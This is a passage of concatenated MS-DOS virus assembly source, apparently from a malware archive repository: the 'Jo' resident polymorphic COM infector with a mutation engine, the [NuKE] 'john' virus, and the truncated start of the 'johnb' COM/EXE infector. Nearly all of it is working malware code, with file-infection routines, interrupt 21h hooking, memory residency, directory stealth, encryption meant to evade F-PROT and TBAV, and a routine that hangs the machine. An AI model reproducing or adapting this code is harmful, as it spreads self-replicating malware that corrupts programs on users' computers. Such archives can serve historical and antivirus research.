sub word ptr es:[bx+1dh],len
meat_hook: ret
com_txt db 'COM',0 ;
reset: ; File Attrib routines
mov cx,20h
set_back:
mov al,01h
find_att:
mov ah,43h ; Alter file attributes
i21: pushf
call cs:[int21]
exitsub: ret
checkit: ; Infect routine
push es ; Save some more registers
push ds
push ds ; Check to see if file is a
pop es ; .COM file if not then
push dx ; quit..
pop di ;
mov cx,0ffh ; Find '.' in File Name
mov al,'.' ;
repnz scasb ;
push cs ;
pop ds ;
mov si,offset com_txt ; Compare with COM extension
mov cx,3 ;
rep cmpsb ;
pop ds ; Restore Reg...
pop es ;
jnz exitsub ;
foundtype: sub di,06h ; Check for commaND.com
cmp ds:[di],'DN' ; Quit if found..
je exitsub ;
mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later
mov word ptr cs:[nameptr+2],ds ;
mov al,00h ; Find Attributes of file to infect
call find_att ;
jc exitsub ; Error Quit.
alteratr: mov cs:[attrib],cx ; Save them
call reset ; Reset them to normal
mov ax,3d02h ; Open file
call i21
jc exitsub ; Error Quit
push cs ; Set DS to CS
pop ds ;
mov ds:[handle],ax ; Store handle
mov ax,5700h ; Read file time and date
mov bx,ds:[handle] ;
call i21 ;
ke9: mov ds:[date],dx ; Save DX
or cx,1ah ; Set Stealth Stamp
mov ds:[time],cx ; Save CX
mov ah,3fh ; Read in first 5 bytes
mov cx,05h ; To save them
mov dx,offset oldstart ;
call i21 ;
closeit: jc close2 ; Error Quit
mov ax,4202h ; Move filepointer to end
mov cx,0ffffh ; -5 bytes offset from end
mov dx,0fffbh ;
call i21 ;
jc close ; Error Quit
mov word ptr cs:si_val,ax ; Save File saize for later
cmp ax,0ea60h ; See if too big
jae close ; Yes then Quit
mov ah,3fh ; Read in last 5 bytes
mov cx,05h ;
mov dx,offset tempmem ;
call i21 ;
jc close ; Error
push cs ; Reset ES to CS
pop es ;
mov di,offset tempmem ; Check if Already infected
mov si,offset string ;
mov cx,5 ;
rep cmpsb ;
jz close ; Yes the Close and Quit
zapfile: ; No Infect and Be Damned
mov ax,word ptr cs:si_val ;
add ax,2 ;
push cs ;
pop ds ;
mov word ptr ds:[jpover+1],ax ; Setup new jump
call mut_eng ; Call Mutation Engine
mov ah,40h ; Save prog to end of file
mov bx,cs:[handle] ; Load Handle
mov cx,length ; LENGTH OF PROGRAM****
call i21 ; Write away
close2: jc close ; Quit if error
push cs ; Reset DS to CS
pop ds ;
mov ax,4200h ; Move File pointer to start
xor cx,cx ; of file
cwd ; Clever way to XOR DX,DX
call i21 ;
jc close ; Error Quit..
mov ah,40h ; Save new start
mov cx,03h ;
mov dx,offset jpover ;
call i21 ;
close: mov ax,5701h ; Restore Time and Date
mov bx,ds:[handle] ;
mov cx,ds:[time] ;
mov dx,ds:[date] ;
call i21 ;
mov ah,3eh ; Close file
call i21 ;
exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they where
mov cx,ds:[attrib] ;
mov ds,word ptr cs:[nameptr+2] ;
call set_back ;
ret ; Return to INT 21h Handler
;
; CyberTech Mutation Engine
;
; This is Version Two of the Mutation Engine
; Unlike others it is very much Virus Specific.. Works
; Best on Resident Viruses..
;
; To Call
;
; si_val = File Size
;
; Returns
; DS:DX = Encrypted Virus Code, Use DS:DX pointer to
; Write From..
mut_eng:
mov ah,2ch ; Get Time
call i21 ;
mov word ptr ds:[switch],dx ; Use Sec./100th counter as key
mov word ptr ds:[switch2+1],dx ; Save to Decrypt and Encrypt
mov ax,cs:[si_val] ; Get file size
mov dx,offset main2 ;
add ax,dx ;
mov word ptr [main+1],ax ; Store to Decrypt offset
xor byte ptr [loop_1+2],28h ; Toggle Add/Sub
xor byte ptr switch2,28h ; "
push cs ; Reset Segment Regs.
pop ds ;
push cs ;
pop ax ; Find Spare Segment
sub ax,0bch ; and put in es
mov es,ax ;
mov si,offset main ; Move Decrypt function
mov di,0100h ;
mov cx,decryptlen ;
rep movsb ;
mov si,offset main2 ; Start the code encrypt
mov cx,virlen ;
loop_10: lodsw ;
switch2: add ax,0000 ;
stosw ;
loop loop_10 ;
mov si,offset string ; move ID string to end
mov cx,5 ; new code
rep movsb ;
mov dx,0100h ; Set Registers to encrypted Virus
push es ; Location
pop ds ;
ret ; Return
; Data Section, contains Messages etc.
; Little message to the Wife to Be..
msg db 'Looking Good Slimline Joanna.',0dh,0ah
db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah
db 'Jo Ver. 1.11 (c) Apache Warrior 92.',0dh,0ah
db '$'
msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$'
virus_name db '[JO]',00h, ; Virus Name..
author db 'By Apache Warrior, ARCV Pres.' ; Thats me..
filler dd 0h
oldstart: mov ax,4c00h ; Orginal program start
int 21h
nop
nop
j100h dd 0100h ; Stores for jumps etc
jpover db 0e9h,00,00h ;
string db '65fd3' ; ID String
heap: ; This code is not saved
handle dw 0h
nameptr dd 0h
attrib dw 0h
date dw 0h
time dw 0h
tempmem db 10h dup (?)
findat db 0h
si_val dw 0h
code ends
end start
MSDOS/J-Index/Virus.MSDOS.Unknown.jo_v111.asm
+429
View File
@@ -0,0 +1,429 @@
NAME Jo
PAGE 55,132
TITLE Jo Virus.
;
; This is Yet another virus from the ARCV, this one is called
; Joanna, it was written by Apache Warrior, ARCV President.
;
; It has Stealth features, it is a Resident infector of .COM files
; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for
; its Polymorphic features. There is a maximum of 3 unchanged bytes
; in the Encrypted code.
;
.model tiny
code segment
ASSUME CS:CODE,DS:CODE,ES:CODE
int_21ofs equ 84h
int_21seg equ 86h
length equ offset handle-offset main
msglen equ offset oldstart-offset msg
tsrlen equ (offset findat-offset main)/10
len equ offset handle-offset main
virlen equ (offset string-offset main2)/2
decryptlen equ offset main2-offset main
org 100h
start: jmp main
db 0,0,0
main: mov si,offset main2 ; SI offset for decrypt
mov cx,virlen ; viri decrypt size
loop_1:
db 2eh,81h,2ch ; decrypt
switch: dw 0
add si,02h
dec cx
jnz loop_1
main2: call findoff ; find file ofset
findoff: pop si ;
sub si,offset findoff
push ds
push es
push cs
pop ds
push cs
pop es
mov ax,0ff05h ; Test for Scythe2 Boot
int 13h
cmp ah,0e9h ; Check for Scythe2 Boot
jnz haha ; no go on
mov ah,09h ; Display message
lea dx,[si+offset msg2]
int 21h
jmp $ ; Crash the machine
haha: mov ah,2ah ; Date Test
int 21h ;
cmp dx,1210h ; Is month the Oct.
jnz main3 ; no go on
mov ah,09h ; Display Message
lea dx,[si+offset msg]
int 21h
main3: mov di,0100h ; move old programs
push si ; start back to the start
mov ax,offset oldstart ;
add si,ax ;
mov cx,05h ;
cld ;
repz movsb ;
inst: mov ax,0ffa4h ; check to see if already instaled
int 21h
pop si ; bring back si
cmp ax,42a1h
je oldprog ; Yes return to old program
tt2: xor ax,ax ; Residency Routine
push ax
mov ax,ds ; Get MCB segment Address
dec ax ;
mov es,ax ; Put MCB segment Address in es
pop ds ;
mov ax,word ptr ds:int_21ofs ; Load Int 21h address data
mov cx,word ptr ds:int_21seg ;
mov word ptr cs:[si+int21],ax ; Move Int 21h data to store
mov word ptr cs:[si+int21+2],cx ;
cmp byte ptr es:[0],5ah ; Check for Start of MCB
jne oldprog ; If no then quit
mov ax,es:[3] ; Play with MCB to get top of
sub ax,0bch ; Memory and reserve 3,008 bytes
jb oldprog ; for Virus
mov es:[3],ax ;
sub word ptr es:[12h],0bch ;
mov es,es:[12h] ;
push ds ;
push cs ;
pop ds ; Move Virus into Memory
mov di,0100h ; space allocated above
mov cx,len+5 ;
push si ;
add si,0100h ;
rep movsb ;
pop si
pop ds
cli ; Stop Interrupts Very Inportant
mov ax,offset new21 ; Load New Int 21h handler
mov word ptr ds:int_21ofs,ax ; address and store
mov word ptr ds:int_21seg,es ;
sti ;
oldprog:
mov di,0100h ; Return to Orginal
pop es ; Program..
pop ds ;
push di ;
ret ;
int21 dd 0h ; Storage For Int 21h Address
;
; New interupt 21h Handler
;
sayitis: mov ax,42a1h ; Install Check..
iret
new21: ;nop ; Sign byte
cmp ax,0ffa4h ; Instalation Check
je sayitis
cmp ah,11h ; FCB Search file
je adjust_FCB
cmp ah,12h ; FCB Search Again
je adjust_FCB
cmp ah,4eh ; Handle Search file
je adjust_FCB
cmp ah,4fh ; Handle Search Again
je adjust_FCB
cmp ah,3dh ; Are they opening a file?
je intgo ; if no ignore
cmp ah,4bh ; Exec Function
jne noint
intgo: push ax ; 4bh, 3dh Infect file
push bx ; Handler save the Registers
push cx
push es
push si
push di
push dx
push ds
call checkit ; Call infect routine
pop ds
pop dx
pop di
pop si
pop es
pop cx
pop bx
pop ax
noint: jmp cs:[int21] ; Return to Orginal Int 21h
adjust_FCB: push es ; Stealth Routine
push bx
push si
push ax
xor si,si
and ah,40h ; Check for handle Search
jz okFCB
mov si,1 ; Set flag
okFCB: mov ah,2fh ; Get DTA Address
int 21h
pop ax ; Restore ax to orginal function
call i21 ; value call it
pushf ; save flags
push ax ; save ax error code
call adjust ; Call stealth adjust routine
pop ax ; restore registers
popf
pop si
pop bx
pop es
retf 2 ; Return to caller
adjust: pushf ; Stealth check routine
cmp si,0 ; Check flag set earlyer
je fcb1
popf
jc repurn ; Check for Handle Search error
mov ah,byte ptr es:[bx+16h] ; No error then carry on
and ah,01ah ; Check stealth stamp
cmp ah,01ah ;
jne repurn ;
sub word ptr es:[bx+1ah],len ; Infected then take the viri size
repurn: ret ; from file size.
fcb1: popf ; Same again but for the FCB
cmp al,0ffh
je meat_hook
cmp byte ptr es:[bx],0ffh
jne xx2
add bx,7
xx2: mov ah,byte ptr es:[bx+17h]
and ah,01ah
cmp ah,01ah
jne meat_hook
sub word ptr es:[bx+1dh],len
meat_hook: ret
com_txt db 'COM',0 ;
reset: ; File Attrib routines
mov cx,20h
set_back:
mov al,01h
find_att:
mov ah,43h ; Alter file attributes
i21: pushf
call cs:[int21]
exitsub: ret
checkit: ; Infect routine
push es ; Save some more registers
push ds
push ds ; Check to see if file is a
pop es ; .COM file if not then
push dx ; quit..
pop di ;
mov cx,0ffh ; Find '.' in File Name
mov al,'.' ;
repnz scasb ;
push cs ;
pop ds ;
mov si,offset com_txt ; Compare with COM extension
mov cx,3 ;
rep cmpsb ;
pop ds ; Restore Reg...
pop es ;
jnz exitsub ;
foundtype: sub di,06h ; Check for commaND.com
cmp ds:[di],'DN' ; Quit if found..
je exitsub ;
mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later
mov word ptr cs:[nameptr+2],ds ;
mov al,00h ; Find Attributes of file to infect
call find_att ;
jc exitsub ; Error Quit.
alteratr: mov cs:[attrib],cx ; Save them
call reset ; Reset them to normal
mov ax,3d02h ; Open file
call i21
jc exitsub ; Error Quit
push cs ; Set DS to CS
pop ds ;
mov ds:[handle],ax ; Store handle
mov ax,5700h ; Read file time and date
mov bx,ds:[handle] ;
call i21 ;
ke9: mov ds:[date],dx ; Save DX
or cx,1ah ; Set Stealth Stamp
mov ds:[time],cx ; Save CX
mov ah,3fh ; Read in first 5 bytes
mov cx,05h ; To save them
mov dx,offset oldstart ;
call i21 ;
closeit: jc close2 ; Error Quit
mov ax,4202h ; Move filepointer to end
mov cx,0ffffh ; -5 bytes offset from end
mov dx,0fffbh ;
call i21 ;
jc close ; Error Quit
mov word ptr cs:si_val,ax ; Save File saize for later
cmp ax,0ea60h ; See if too big
jae close ; Yes then Quit
mov ah,3fh ; Read in last 5 bytes
mov cx,05h ;
mov dx,offset tempmem ;
call i21 ;
jc close ; Error
push cs ; Reset ES to CS
pop es ;
mov di,offset tempmem ; Check if Already infected
mov si,offset string ;
mov cx,5 ;
rep cmpsb ;
jz close ; Yes the Close and Quit
zapfile: ; No Infect and Be Damned
mov ax,word ptr cs:si_val ;
add ax,2 ;
push cs ;
pop ds ;
mov word ptr ds:[jpover+1],ax ; Setup new jump
call mut_eng ; Call Mutation Engine
mov ah,40h ; Save prog to end of file
mov bx,cs:[handle] ; Load Handle
mov cx,length ; LENGTH OF PROGRAM****
call i21 ; Write away
close2: jc close ; Quit if error
push cs ; Reset DS to CS
pop ds ;
mov ax,4200h ; Move File pointer to start
xor cx,cx ; of file
cwd ; Clever way to XOR DX,DX
call i21 ;
jc close ; Error Quit..
mov ah,40h ; Save new start
mov cx,03h ;
mov dx,offset jpover ;
call i21 ;
close: mov ax,5701h ; Restore Time and Date
mov bx,ds:[handle] ;
mov cx,ds:[time] ;
mov dx,ds:[date] ;
call i21 ;
mov ah,3eh ; Close file
call i21 ;
exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they where
mov cx,ds:[attrib] ;
mov ds,word ptr cs:[nameptr+2] ;
call set_back ;
ret ; Return to INT 21h Handler
;
; CyberTech Mutation Engine
;
; This is Version Two of the Mutation Engine
; Unlike others it is very much Virus Specific.. Works
; Best on Resident Viruses..
;
; To Call
;
; si_val = File Size
;
; Returns
; DS:DX = Encrypted Virus Code, Use DS:DX pointer to
; Write From..
mut_eng:
mov ah,2ch ; Get Time
call i21 ;
mov word ptr ds:[switch],dx ; Use Sec./100th counter as key
mov word ptr ds:[switch2+1],dx ; Save to Decrypt and Encrypt
mov ax,cs:[si_val] ; Get file size
mov dx,offset main2 ;
add ax,dx ;
mov word ptr [main+1],ax ; Store to Decrypt offset
xor byte ptr [loop_1+2],28h ; Toggle Add/Sub
xor byte ptr switch2,28h ; "
push cs ; Reset Segment Regs.
pop ds ;
push cs ;
pop ax ; Find Spare Segment
sub ax,0bch ; and put in es
mov es,ax ;
mov si,offset main ; Move Decrypt function
mov di,0100h ;
mov cx,decryptlen ;
rep movsb ;
mov si,offset main2 ; Start the code encrypt
mov cx,virlen ;
loop_10: lodsw ;
switch2: add ax,0000 ;
stosw ;
loop loop_10 ;
mov si,offset string ; move ID string to end
mov cx,5 ; new code
rep movsb ;
mov dx,0100h ; Set Registers to encrypted Virus
push es ; Location
pop ds ;
ret ; Return
; Data Section, contains Messages etc.
; Little message to the Wife to Be..
msg db 'Looking Good Slimline Joanna.',0dh,0ah
db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah
db 'Jo Ver. 1.11 (c) Apache Warrior 92.',0dh,0ah
db '$'
msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$'
virus_name db '[JO]',00h, ; Virus Name..
author db 'By Apache Warrior, ARCV Pres.' ; Thats me..
filler dd 0h
oldstart: mov ax,4c00h ; Orginal program start
int 21h
nop
nop
j100h dd 0100h ; Stores for jumps etc
jpover db 0e9h,00,00h ;
string db '65fd3' ; ID String
:heap ; This code is not saved
handle dw 0h
nameptr dd 0h
attrib dw 0h
date dw 0h
time dw 0h
tempmem db 10h dup (?)
findat db 0h
si_val dw 0h
code ends
end start
MSDOS/J-Index/Virus.MSDOS.Unknown.john.asm
+459
View File
@@ -0,0 +1,459 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿsub byte ptr [di],07dh
add byte ptr [di],0d5h
not byte ptr [di]
add byte ptr [di],035h
sub byte ptr [di],022h
not byte ptr [di]
add byte ptr [di],034h
add byte ptr [di],012h
inc byte ptr [di]
sub byte ptr [di],0e8h
add word ptr [di],08522h
xor byte ptr [di],058h
inc word ptr [di]
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿ;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿdec word ptr [di]
xor byte ptr [di],058h
sub word ptr [di],08522h
add byte ptr [di],0e8h
dec byte ptr [di]
sub byte ptr [di],012h
sub byte ptr [di],034h
not byte ptr [di]
add byte ptr [di],022h
sub byte ptr [di],035h
not byte ptr [di]
sub byte ptr [di],0d5h
add byte ptr [di],07dh
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;Call label
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov AH,9 ;yeah!!
MOV DX,OFFSET PAO ;print my text!
INT 21H ;now!
INT 20H ;an finsh te program
NO_DAY: ;label to incorrect date
ret ;return from call
;---------------------------------
ÿ
PAO:
DB 10,13,'you are infected with john virus ver 1.0a','$'
;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 08H ;day for the action
action_mes Db 04H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
MSDOS/J-Index/Virus.MSDOS.Unknown.johnb.asm
+484
View File
@@ -0,0 +1,484 @@
;******************************************************************
;* *
;* My First Virus, a simple non-overwriting COM and EXE *
;* infector. *
;* by, Joshua *
;* *
;******************************************************************
ID = 'SS' ; My ID
.model tiny ; Memory model
.code ; Start Code
org 100h ; Start of COM file
MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS
START proc near
DECRYPT: mov bx,offset START_VIRUS ; Find out our offset
mov cx,(END_VIRUS-START_VIRUS)/2
DECRYPT_LOOP: db 2eh,81h,37h ; XOR [BX],xxxx
KEY dw 0 ; Crypt KEY
add bx,2 ; Increment offset
dec cx ; Decrement counter
jnz DECRYPT_LOOP ; Continue until done
START_VIRUS:
call FIND_OFFSET ; Real start of virus
; Calculate change in offset from host program.
FIND_OFFSET: pop bp ; BP holds current IP
sub bp, offset FIND_OFFSET ; Calculate net change
; Change BP to start of
; virus code
; Capture INT 24h Critical error handler.
push es ; Save ES
mov ax,3524h ; DOS get interupt vector
int 21h ; Call DOS to do it
mov word ptr [bp+OLDINT24],bx ; Save old INT 24h
mov word ptr [bp+OLDINT24+2],es ; vector
mov ah,25h ; DOS set interupt vector
lea dx,[bp+NEWINT24] ; Address of new interupt
int 21h ; Call DOS to do it
pop es ; Restore ES
; Find out what kind of program I am, COM or EXE, by checking stack pointer.
; This is where I store my ID in an EXE infection.
cmp sp,ID ; COM or EXE?
je RESTORE_EXE ; I am an EXE file
; Restore original bytes to the COM program.
RESTORE_COM: lea si,[bp+COM_START] ; Restore original 3 bytes
mov di,100h ; to 100h, start of file
push di ; Jmp to 100h when done
movsw ; Copy 3 bytes
movsb
jmp short RESTORE_DONE
; Restore original bytes to the EXE program.
RESTORE_EXE: push ds ; Save original DS
push es ; Save original ES
push cs ; Set DS = CS
pop ds
push cs ; Set ES = CS
pop es
lea si,[bp+JMPSAVE] ; Copy original CS:IP and
lea di,[bp+JMPSAVE2] ; SS:SP for return
movsw ; Copy 8 bytes
movsw
movsw
movsw
; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy
; original command line parameters.
RESTORE_DONE: lea dx,[bp+DTA] ; Point to new DTA area
mov ah,1ah ; DOS set DTA
int 21h ; Call DOS to do it
; Save original directory.
mov ah,47h ; DOS get current directory
lea si,[bp+ORIG_DIR] ; Store it here
mov dl,0 ; Current drive
int 21h ; Call DOS to do it
; Search for a file to infect.
SEARCH: lea dx,[bp+EXE_MASK] ; Search for any EXE file
call FINDFIRST ; Begin search
lea dx,[bp+COM_MASK] ; Search for any COM file
call FINDFIRST ; Begin search
mov ah,3bh ; DOS change directory
lea dx,[bp+DOTDOT] ; Go up one direcotry
int 21h ; Call DOS to do it
jnc SEARCH ; Go look for more files
; Restore default DTA, original directory, and pass control back to
; original program.
QUIT: mov ah,3bh ; DOS change directory
lea dx,[bp+ORIG_DIR-1] ; Point to original directory
int 21h ; Call DOS to do it
push ds ; Save DS
mov ax,2524h ; DOS set interupt vector
lds dx,[bp+OLDINT24] ; Restore INT 24h
int 21h ; Call DOS to do it
pop ds ; Restore DS
mov ah,1ah ; DOS set DTA
